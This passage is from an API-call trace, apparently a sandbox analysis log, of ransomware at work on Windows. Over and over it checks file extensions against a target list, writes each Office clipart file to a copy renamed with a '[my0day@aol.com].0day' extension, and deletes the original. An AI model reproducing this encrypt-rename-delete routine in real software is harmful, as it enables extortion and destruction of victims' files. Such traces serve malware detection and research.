lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.991] lstrlenW (lpString=".7z") returned 3 [0054.991] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0054.991] lstrlenW (lpString=".dbf") returned 4 [0054.991] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0054.991] lstrlenW (lpString=".1cd") returned 4 [0054.991] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0054.991] lstrlenW (lpString=".jpg") returned 4 [0054.991] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.991] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.992] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0054.992] GetLastError () returned 0x0 [0054.992] ReadFile (in: hFile=0x1a8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0xbc4, lpOverlapped=0x0) returned 1 [0054.993] WriteFile (in: hFile=0x1d8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xbd0, lpOverlapped=0x0) returned 1 [0054.994] ReadFile (in: hFile=0x1a8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.994] WriteFile (in: hFile=0x1d8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.994] SetEndOfFile (hFile=0x1d8) returned 1 [0054.994] CloseHandle (hObject=0x1d8) returned 1 [0054.994] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.995] SetEndOfFile (hFile=0x1a8) returned 1 [0054.995] CloseHandle (hObject=0x1a8) returned 1 [0054.995] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0054.996] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf")) returned 1 [0054.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0054.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0054.996] lstrlenW (lpString=".doc") returned 4 [0054.996] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.996] lstrlenW (lpString=".docx") returned 5 [0054.996] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.996] lstrlenW (lpString=".pdf") returned 4 [0054.996] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.996] lstrlenW (lpString=".xls") returned 4 [0054.996] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.996] lstrlenW (lpString=".xlsx") returned 5 [0054.996] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.996] lstrlenW (lpString=".ppt") returned 4 [0054.996] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0054.996] lstrlenW (lpString=".zip") returned 4 [0054.996] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.996] lstrlenW (lpString=".rar") returned 4 [0054.996] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.996] lstrlenW (lpString=".bz2") returned 4 [0054.996] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.996] lstrlenW (lpString=".7z") returned 3 [0054.996] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0054.996] lstrlenW (lpString=".dbf") returned 4 [0054.996] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0054.997] lstrlenW (lpString=".1cd") returned 4 [0054.997] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0054.997] lstrlenW (lpString=".jpg") returned 4 [0054.997] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.997] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.997] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.997] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0054.997] GetLastError () returned 0x0 [0054.997] ReadFile (in: hFile=0x1a8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0xac4, lpOverlapped=0x0) returned 1 [0054.999] WriteFile (in: hFile=0x1d8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xad0, lpOverlapped=0x0) returned 1 [0054.999] ReadFile (in: hFile=0x1a8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.999] WriteFile (in: hFile=0x1d8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.000] SetEndOfFile (hFile=0x1d8) returned 1 [0055.000] CloseHandle (hObject=0x1d8) returned 1 [0055.000] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.000] SetEndOfFile (hFile=0x1a8) returned 1 [0055.001] CloseHandle (hObject=0x1a8) returned 1 [0055.001] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0055.001] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf")) returned 1 [0055.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0055.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0055.001] lstrlenW (lpString=".doc") returned 4 [0055.001] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.001] lstrlenW (lpString=".docx") returned 5 [0055.001] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.001] lstrlenW (lpString=".pdf") returned 4 [0055.001] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.001] lstrlenW (lpString=".xls") returned 4 [0055.001] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.002] lstrlenW (lpString=".xlsx") returned 5 [0055.002] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.002] lstrlenW (lpString=".ppt") returned 4 [0055.002] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0055.002] lstrlenW (lpString=".zip") returned 4 [0055.002] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.002] lstrlenW (lpString=".rar") returned 4 [0055.002] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.002] lstrlenW (lpString=".bz2") returned 4 [0055.002] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.002] lstrlenW (lpString=".7z") returned 3 [0055.002] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0055.002] lstrlenW (lpString=".dbf") returned 4 [0055.002] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0055.002] lstrlenW (lpString=".1cd") returned 4 [0055.002] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0055.002] lstrlenW (lpString=".jpg") returned 4 [0055.002] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.002] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.002] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0055.003] GetLastError () returned 0x0 [0055.003] ReadFile (in: hFile=0x1a8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x1ccc, lpOverlapped=0x0) returned 1 [0055.046] WriteFile (in: hFile=0x1d8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x1cd0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1cd0, lpOverlapped=0x0) returned 1 [0055.047] ReadFile (in: hFile=0x1a8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.047] WriteFile (in: hFile=0x1d8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.047] SetEndOfFile (hFile=0x1d8) returned 1 [0055.398] CloseHandle (hObject=0x1d8) returned 1 [0055.419] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.424] SetEndOfFile (hFile=0x1a8) returned 1 [0055.430] CloseHandle (hObject=0x1a8) returned 1 [0055.430] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0055.430] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf")) returned 1 [0056.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0056.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0056.426] lstrlenW (lpString=".doc") returned 4 [0056.426] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.426] lstrlenW (lpString=".docx") returned 5 [0056.426] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.426] lstrlenW (lpString=".pdf") returned 4 [0056.426] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.426] lstrlenW (lpString=".xls") returned 4 [0056.426] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.426] lstrlenW (lpString=".xlsx") returned 5 [0056.426] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.426] lstrlenW (lpString=".ppt") returned 4 [0056.426] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0056.426] lstrlenW (lpString=".zip") returned 4 [0056.426] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.426] lstrlenW (lpString=".rar") returned 4 [0056.426] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.426] lstrlenW (lpString=".bz2") returned 4 [0056.426] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.426] lstrlenW (lpString=".7z") returned 3 [0056.426] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0056.426] lstrlenW (lpString=".dbf") returned 4 [0056.426] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0056.426] lstrlenW (lpString=".1cd") returned 4 [0056.426] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0056.426] lstrlenW (lpString=".jpg") returned 4 [0056.426] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.559] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.559] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.559] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0056.560] GetLastError () returned 0x0 [0056.560] ReadFile (in: hFile=0x240, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x1204, lpOverlapped=0x0) returned 1 [0056.571] WriteFile (in: hFile=0x17c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1210, lpOverlapped=0x0) returned 1 [0056.572] ReadFile (in: hFile=0x240, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.572] WriteFile (in: hFile=0x17c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.572] SetEndOfFile (hFile=0x17c) returned 1 [0056.573] CloseHandle (hObject=0x17c) returned 1 [0056.573] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.573] SetEndOfFile (hFile=0x240) returned 1 [0056.574] CloseHandle (hObject=0x240) returned 1 [0056.574] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.574] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf")) returned 1 [0056.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0056.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0056.574] lstrlenW (lpString=".doc") returned 4 [0056.574] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.574] lstrlenW (lpString=".docx") returned 5 [0056.574] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.574] lstrlenW (lpString=".pdf") returned 4 [0056.574] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.574] lstrlenW (lpString=".xls") returned 4 [0056.575] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.575] lstrlenW (lpString=".xlsx") returned 5 [0056.575] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.575] lstrlenW (lpString=".ppt") returned 4 [0056.575] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0056.575] lstrlenW (lpString=".zip") returned 4 [0056.575] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.575] lstrlenW (lpString=".rar") returned 4 [0056.575] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.575] lstrlenW (lpString=".bz2") returned 4 [0056.575] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.575] lstrlenW (lpString=".7z") returned 3 [0056.575] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0056.575] lstrlenW (lpString=".dbf") returned 4 [0056.575] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0056.575] lstrlenW (lpString=".1cd") returned 4 [0056.575] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0056.575] lstrlenW (lpString=".jpg") returned 4 [0056.575] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.575] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.575] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0056.576] GetLastError () returned 0x0 [0056.576] ReadFile (in: hFile=0x240, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0xc48, lpOverlapped=0x0) returned 1 [0056.669] WriteFile (in: hFile=0x17c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xc50, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x240, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.670] WriteFile (in: hFile=0x17c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.670] SetEndOfFile (hFile=0x17c) returned 1 [0056.670] CloseHandle (hObject=0x17c) returned 1 [0056.670] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.670] SetEndOfFile (hFile=0x240) returned 1 [0056.671] CloseHandle (hObject=0x240) returned 1 [0056.671] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.671] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf")) returned 1 [0056.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0056.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0056.687] lstrlenW (lpString=".doc") returned 4 [0056.687] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.687] lstrlenW (lpString=".docx") returned 5 [0056.688] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.688] lstrlenW (lpString=".pdf") returned 4 [0056.688] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.688] lstrlenW (lpString=".xls") returned 4 [0056.688] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.688] lstrlenW (lpString=".xlsx") returned 5 [0056.688] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.688] lstrlenW (lpString=".ppt") returned 4 [0056.688] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0056.688] lstrlenW (lpString=".zip") returned 4 [0056.688] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.688] lstrlenW (lpString=".rar") returned 4 [0056.688] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.688] lstrlenW (lpString=".bz2") returned 4 [0056.688] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.688] lstrlenW (lpString=".7z") returned 3 [0056.688] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0056.688] lstrlenW (lpString=".dbf") returned 4 [0056.688] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0056.688] lstrlenW (lpString=".1cd") returned 4 [0056.688] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0056.688] lstrlenW (lpString=".jpg") returned 4 [0056.688] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.690] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.690] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0056.690] GetLastError () returned 0x0 [0056.690] ReadFile (in: hFile=0x240, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x212c, lpOverlapped=0x0) returned 1 [0056.728] WriteFile (in: hFile=0x17c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x2130, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, 